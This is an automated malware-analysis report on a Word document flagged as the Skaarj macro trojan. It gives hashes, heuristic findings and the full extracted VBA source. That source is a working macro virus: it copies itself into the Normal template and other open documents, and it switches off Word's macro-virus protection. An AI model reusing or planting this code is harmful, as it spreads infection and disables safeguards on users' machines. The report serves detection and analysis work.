Office (OLE) malware analysis — malicious · 284cadf5debb28b1

MALICIOUS

Office (OLE)

47.5 KB Created: 2003-07-08 11:03:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 70b1cbc8cae4e9e8e9b8aebfcc4f7a0f SHA-1: 92a2b47337eb3028684f4834a48126e1145328e8 SHA-256: 284cadf5debb28b1f33497c9a5826763027ac31e6b19be97ff03b2bdde7ac24a

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing legacy WordBasic macro markers and VBA macros. ClamAV identified the embedded artifact as 'Doc.Trojan.Skaarj-1', suggesting a known trojan. The VBA macro includes code that displays various messages and appears to be designed for malicious purposes, consistent with the Skaarj family.

Heuristics 3

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
                            C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5023 bytes
SHA-256: `fac990f5b54c2fb06f1512c1a9ef7c71b86b8e5089a9ecba1313ef99c4b9fb80`
Detection ClamAV: Doc.Trojan.Skaarj-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() Const MarkSign = "Mazdai II (Free-Harm Built) Version 2.2 © SKAARJ Y2K" On Error GoTo handler Dim WDoc As Word.Document, M As Object, C As Object, Infected As Boolean, Found As Boolean Dim Saved As Boolean, Mon As String, Phrase As Byte, t As Long, i As Long, N As Boolean, Process As Byte Set M = Nothing N = False Process = 0 Mon = GetSetting("Visdata", "Engines", "sizeX") If Mon = "" Then SaveSetting "Visdata", "Engines", "sizeX", Month(Now) ElseIf Mon - Month(Now) <> 0 Then If Rnd * 20 < 1 Then Do Phrase = Int(12 * Rnd) Loop While Phrase > 11 Select Case Phrase Case 0: MsgBox "Nowhere to run, nowhere to hide ", vbExclamation, "Mazdai II" Case 1: MsgBox "Life is short - boost yourself", vbExclamation, "Mazdai II" Case 3: MsgBox "It's nice to be important, but it's more important to be nice ;-)" & vbCrLf & "Scooter", vbExclamation, "Mazdai II" Case 4: MsgBox "I have no mouth and I must scream", vbExclamation, "Mazdai II" Case 5: MsgBox "Death is not punishment - it is disposal", vbExclamation, "Mazdai II" Case 6: MsgBox "Trust no one", vbExclamation, "Mazdai II" Case 7: MsgBox "Forget the past - work for the future", vbExclamation, "Mazdai II" Case 8: MsgBox "Time is NOW!", vbExclamation, "Mazdai II" Case 9: MsgBox "SMILE! :~)", vbExclamation, "Mazdai II" Case 10: MsgBox "Touch the SKY!", vbExclamation, "Mazdai II" Case 11: MsgBox "The truth is out there", vbExclamation, "Mazdai II" End Select End If End If Found = False For Each C In NormalTemplate.VBProject.VBComponents If C.Type = 100 Then If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then Found = True Set M = C.CodeModule End If End If Next Do For Each WDoc In Word.Documents If WDoc.SaveFormat = wdFormatDocument Or WDoc.SaveFormat = wdFormatTemplate Then For Each C In WDoc.VBProject.VBComponents If C.Type = 100 Then If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then Set M = C.CodeModule Found = True ElseIf Found Then Saved = WDoc.Saved On Error GoTo handler t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc) out: C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc)) With Dialogs(wdDialogFileSummaryInfo) .Title = "Surprise!!!" .Author = "SKAARJ" .Comments = "This is a second virus of SKAARJ from RUSSIA. This virus will not harm your system - it's only a test" .Keywords = "SKAARJ, Virii, HTP, Experiment, Mazdai II" End With If Saved Then WDoc.Save Infected = True End If End If Next End If Next Process = Process + 1 If Process = 3 Then Exit Do Loop Until Infected If Found Then For Each C In NormalTemplate.VBProject.VBComponents If C.Type = 100 Then If Not C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then Saved = NormalTemplate.Saved N = True t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc) out1: C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc)) If Saved Then NormalTemplate.Save End If End If Next End If With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With Exit Sub handler: t = 1 If N = False Then Resume out Else Resume out1 End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.